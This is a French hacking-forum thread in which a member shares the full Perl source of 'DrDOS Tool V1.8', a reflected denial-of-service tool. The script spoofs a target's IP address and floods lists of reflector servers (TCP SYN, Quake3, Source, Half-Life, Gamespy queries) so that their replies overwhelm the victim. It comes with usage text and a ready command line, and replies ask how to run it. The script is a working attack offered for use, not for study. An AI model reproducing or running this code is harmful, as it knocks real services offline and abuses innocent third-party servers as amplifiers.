• Salut Visiteur ! ✌
    Découvre nos partenaires officiels avec VeryLeak's. Des choix réfléchis, dignes de confiance pour tes avantages.

    StoryFound | REFUNDER TEAM

    StoryFound

    Rejoindre le Canal ✨ ou Plus d'information 📃

    Une question ? Rejoingnez nos différents canaux (Discord, Telegram, Revolt)

    Nos Canaux Communautaires

    Cet affichage peut se clôturer définitivement via la croix en haut à droite.

Layer 4 DrDos

MWHAX7

VeryLeak's Unique Member 👑
Level 5
VeryFriend's

Torrents Stats

Messages
830
J'aime
1 003
Trophées
1 404
Inscrit
22 Décembre 2015
25e15137db8d18b4c26e4a1b9b105ca8.png

Code:
#!/usr/bin/perl -w
 
use Benchmark;
use Net::RawIP;
use Time::HiRes qw ( usleep );
 
my $rand = int( rand 0x400 );
my $frag = 0;
my $doff = 0x05;
my $ttl  = 0xFF;
my $tos  = 0x08;
my $pid;
my $tx;
my @list;
my @running;
my @pids;
 
my %attack =
  ( "tcp" => \&tcp, "quake3" => \&quake3, "source" => \&source, "hl" => \&hl, "gs" => \&gs, "gs2" => \&gs2 );
 
if ( @ARGV < 7 || @ARGV > 7 ) {
    &usage();
    exit;
}
 
$tx = $ARGV[3];
my $t0 = new Benchmark;
 
print "\n*** Now Reading Hosts Into Array\n\n";
 
open( ELITE, $ARGV[2] ) || die "Unable to open $ARGV[2]!\n";
chomp( @list = <ELITE> );
close(ELITE);
 
sub tcp {
    my ( $ip, $port ) = @_;
    my $a = new Net::RawIP(
        {
            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl },
            tcp => {
                dest   => $port,
                source => $ARGV[1],
                syn    => 1,
                ack    => 0,
                fin    => 0,
                rst    => 0,
                psh    => 0,
                urg    => 0,
                doff   => $doff
            }
        }
    );
    $a->send( 0, $tx );
}
 
sub quake3 {
    my ( $ip, $port ) = @_;
    my $a = new Net::RawIP(
        {
            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
            udp => {
                dest   => $port,
                source => $ARGV[1],
                data   => chr(255) . chr(255) . chr(255) . chr(255) . "getstatus" . chr(10),
            }
        }
    );
    $a->send( 0, $tx );
  
 
}
 
sub source {
    my ( $ip, $port ) = @_;
    my $a = new Net::RawIP(
        {
            ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
            udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . chr(85), }
        }
    );
    $a->send( 0, $tx );
  
 
}
 
sub hl {
    my ( $ip, $port ) = @_;
    my $a = new Net::RawIP(
        {
            ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
            udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . "rules", }
        }
    );
    $a->send( 0, $tx );
  
}
 
sub gs {
    my ( $ip, $port ) = @_;
    my $a = new Net::RawIP(
        {
            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
            udp => {
                dest   => $port,
                source => $ARGV[1],
                data   => chr(92) . chr(115) . chr(116) . chr(97) . chr(116) . chr(117) . chr(115) . chr(92),
            }
        }
    );
    $a->send( 0, $tx );
  
}
 
sub gs2 {
    my ( $ip, $port ) = @_;
    my $a = new Net::RawIP(
        {
            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
            udp => {
                dest   => $port,
                source => $ARGV[1],
                data   => chr(254)
                  . chr(253)
                  . chr(0)
                  . chr(67)
                  . chr(79)
                  . chr(82)
                  . chr(89)
                  . chr(255)
                  . chr(255)
                  . chr(255),
            }
        }
    );
    $a->send( 0, $tx );
  
}
 
sub paxor {
    my $type = $_[0];
    unless ( $type eq "mixed" ) {
        while (1) {
                        foreach (@list) { $attack{$type}->( split( ':', $_ ) );}
        }
    }
    else {
        my @part;
        while (1) {
            foreach (@list) {
                @part = split( ":", $_ );
                $attack{ $part[2] }->( $part[0], $part[1]);
            }
        }
    }
}
 
 
for($number = 0;$number < $ARGV[5];$number++)
{
$pid = fork();
if ( $pid == 0 ) {
    $SIG{INT} = \&controlsub;
 
    &paxor( $ARGV[4] );
 
    my $t1 = new Benchmark;
    my $td = timediff( $t1, $t0 );
    print "\nTotal Time: ", timestr($td), "\n";
    sleep(5);
    exit;
}
else {
        push(@pids, $pid);
}
}
sleep( $ARGV[6] );
foreach(@pids)
{
        kill( "INT", $_ );
}
        exit;
 
sub controlme {
    $SIG{INT} = \&controlme;
    print "Signal Caught Now Exiting\n";
    my $t1 = new Benchmark;
    my $td = timediff( $t1, $t0 );
    print "\nTotal Time: ", timestr($td), "\n";
    sleep(5);
    exit;
}
 
sub controlsub {
    $SIG{INT} = \&controlsub;
    exit;
}
 
 
sub usage {
    print << "HEREDOC";
$0 <target> <target port> <reflector list> <weight> <attack type> <threads> <Time>
DrDOS Tool V1.8 FINAL by ohnoes1479
 
Time: Limit running time of the script, Time is in seconds
threads: number of threads to run
attack types:
tcp:     reflected tcp SYN attack
quake3:  reflected udp attack using quake3 based servers
source:  reflected udp attack using Valve Source based servers
hl:      reflected udp attack using Half Life servers
gs:      reflected udp attack using Gamespy based servers
gs2:     reflected udp attack using Gamespy 2 based servers
mixed:   specify type of server in list, EG:
8.8.8.8:80:tcp
64.120.46.100:28960:quake3
Command: $0 127.0.0.1 8080 servers.txt 5 tcp
HEREDOC
 
}
Code:
perl drdos.pl 127.0.0.1 80 servers.txt 5 tcp 10 3600

Source :
http://i.imgur.com/GSKsCd5.png


Source :
lien ou image supprimée
 

Curtis la frappe

Nouveau 🌱
Level 1

Torrents Stats

Messages
9
J'aime
0
Trophées
3
Inscrit
7 Octobre 2017
Comment on l'utilise et sur quel logiciel ?
 

Kaimo

l'Accru 🥇
Level 3

Torrents Stats

Messages
103
J'aime
84
Trophées
122
Inscrit
25 Novembre 2018
Il faut un serveur VPS nan ?
 
Haut Bas